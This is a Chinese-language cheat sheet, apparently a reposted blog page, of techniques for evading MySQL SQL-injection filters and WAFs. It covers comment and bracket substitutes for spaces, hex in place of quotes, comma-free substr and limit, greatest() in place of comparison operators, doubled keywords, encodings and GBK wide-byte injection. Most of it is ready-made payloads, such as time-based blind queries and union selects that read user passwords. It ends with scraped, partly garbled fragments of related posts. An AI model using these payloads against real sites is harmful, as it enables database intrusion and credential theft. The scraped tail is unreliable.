1.繞過空格(注釋符/* */,%a0):
兩個空格代替乙個空格,用tab代替空格,%a0=空格:
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/
最基本的繞過方法,用注釋替換空格:
/*注釋 */
使用浮點數:
select * from users where id=8e0union select 1,2,3
select * from users where id=8.0 select 1,2,3
2.括號繞過空格:
如果空格被過濾,括號沒有被過濾,可以用括號繞過。
在mysql中,括號是用來包圍子查詢的。因此,任何可以計算出結果的語句,都可以用括號包圍起來。而括號的兩端,可以沒有多餘的空格。
例如:select(user())from dual where(1=1)and(2=2)
這種過濾方法常常用於time based盲注,例如:
?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23
(from for屬於逗號繞過下面會有)
上面的方法既沒有逗號也沒有空格。猜解database()第乙個字元ascii碼是否為109,若是則載入延時。
3.引號繞過(使用十六進製制):
會使用到引號的地方一般是在最後的where子句中。如下面的一條sql語句,這條語句就是乙個簡單的用來查選得到users表中所有欄位的一條語句:
select column_name from information_schema.tables where table_name="users"
這個時候如果引號被過濾了,那麼上面的where子句就無法使用了。那麼遇到這樣的問題就要使用十六進製制來處理這個問題了。
users的十六進製制的字串是7573657273。那麼最後的sql語句就變為了:
select column_name from information_schema.tables where table_name=0x7573657273
4.逗號繞過(使用from或者offset):
在使用盲注的時候,需要使用到substr(),mid(),limit。這些子句方法都需要使用到逗號。對於substr()和mid()這兩個方法可以使用from to的方式來解決:
select substr(database() from 1 for 1);
select mid(database() from 1 for 1);
使用join:
union select 1,2#等價於
union select * from (select 1)a join (select 2)b
使用like:
select ascii(mid(user(),1,1))=80#等價於
select user() like 'r%'
對於limit可以使用offset來繞過:
select * from news limit 0,1# 等價於下面這條sql語句
select * from news limit 1 offset 0
5.比較符號(<>)繞過(過濾了<>:sqlmap盲注經常使用<>,使用between的指令碼):
使用greatest()、least():(前者返回最大值,後者返回最小值)
同樣是在使用盲注的時候,在使用二分查詢的時候需要使用到比較操作符來進行查詢。如果無法使用比較操作符,那麼就需要使用到greatest來進行繞過了。
最常見的乙個盲注的sql語句:
select * from users where id=1 and ascii(substr(database(),0,1))>64
此時如果比較操作符被過濾,上面的盲注語句則無法使用,那麼就可以使用greatest來代替比較操作符了。greatest(n1,n2,n3,...)函式返回輸入引數(n1,n2,n3,...)的最大值。
那麼上面的這條sql語句可以使用greatest變為如下的子句:
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
使用between and:
between a and b:返回a,b之間的資料,不包含b。
6.or and xor not繞過:
and=&& or=|| xor=| not=!
7.繞過注釋符號(#,--(後面跟乙個空格))過濾:
id=1'union select 1,2,3||'1
最後的or '1閉合查詢語句的最後的單引號,或者:
id=1'union select 1,2,'3
8.=繞過:
使用like 、rlike 、regexp 或者 使用< 或者 >
9.繞過union,select,where等:
(1)使用注釋符繞過:
常用注釋符:
//,-- , /**/, #, --+, -- -, ;,%00,--a
用法:u/**/ nion /**/ se/**/ lect /**/user,pwd from user
(2)使用大小寫繞過:
id=-1'union/**/select
(3)內聯注釋繞過:
id=-1'/*!union*/ select 1,2,concat(/*!table_name*/) from /*information_schema*/.tables /*!where *//*!table_schema*/ like database()#
(4) 雙關鍵字繞過(若刪除掉第乙個匹配的union就能繞過):
id=-1'uniuniononselselectect1,2,3–-
10.通用繞過(編碼):
如urlencode編碼,ascii,hex,unicode編碼繞過:
or 1=1即%6f%72%20%31%3d%31,而test也可以為char(101)+char(97)+char(115)+char(116)。
11.等價函式繞過:
hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==>datadir()
舉例:substring()和substr()無法使用時:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74或者:
substr((select 'password'),1,1) = 0x70strcmp(left('password',1), 0x69) = 1strcmp(left('password',1), 0x70) = 0strcmp(left('password',1), 0x71) = -1
12.寬位元組注入:
過濾 ' 的時候往往利用的思路是將 ' 轉換為 \' 。
在 mysql 中使用 gbk 編碼的時候,會認為兩個字元為乙個漢字,一般有兩種思路:
(1)%df 吃掉 \ 具體的方法是 urlencode('\) =
%5c%27,我們在 %5c%27 前面新增 %df ,形成 %df%5c%27 ,而 mysql 在 gbk
編碼方式的時候會將兩個位元組當做乙個漢字,%df%5c 就是乙個漢字,%27 作為乙個單獨的(')符號在外面:
id=-1%df%27union select 1,user(),3--+
(2)將 \' 中的 \ 過濾掉,例如可以構造 %**%5c%5c%27 ,後面的 %5c 會被前面的 %5c 注釋掉。
一般產生寬位元組注入的php函式:
1.replace():過濾 ' \ ,將 ' 轉化為 \' ,將 \ 轉為 \\,將 " 轉為 \" 。用思路一。
2.addslaches():返回在預定義字元之前新增反斜槓(\)的字串。預定義字元:' , " , \ 。用思路一
(防禦此漏洞,要將 mysql_query 設定為 binary 的方式)
3.mysql_real_escape_string():轉義下列字元:
\x00 \n \r \ '" \x1a
(防禦,將mysql設定為gbk即可)
本文**
mysql 注釋 繞過 sql注入繞過方法
一 注釋符號繞過 在sql中常用的注釋符號有 二 大小寫繞過 當web正則過濾的時候對大小寫不敏感的情況下使用,一般很少會有這種漏洞 比如當過濾了select的時候我們可以採用select來查詢 三 內聯注釋繞過 把要使用的查詢語句放在 中,這樣在一般的資料庫是不會執行的,但是在mysql中內聯注釋...
mysql注入轉義繞過 SQL注入防禦繞過
一 寬位元組注入 1 什麼是寬位元組 gb2312 gbk gb18030 big5等這些都是常說的寬位元組,實際為兩位元組 2 寬位元組注入原理 防禦 將 轉換為 繞過 將 消滅 mysql在使用gbk編碼的時候,會認為兩個字元為乙個漢字 編碼為 5c 編碼為 27 df 5c mysql會認為是...
mysql手工注入繞過 sql注入繞過WAF
這幾天的ctf題中有好幾道題都是sql注入的,但都存在waf需要繞過,於是整理了一些常見的繞過waf注入的方法。在現實sql注入中我們也常常碰到waf,那麼掌握常見的繞過很有必要。0x01 手工注入繞過 1 大小寫混合例如 union select 1,2,3,4 只適用於針對大小寫關鍵字的匹配 2...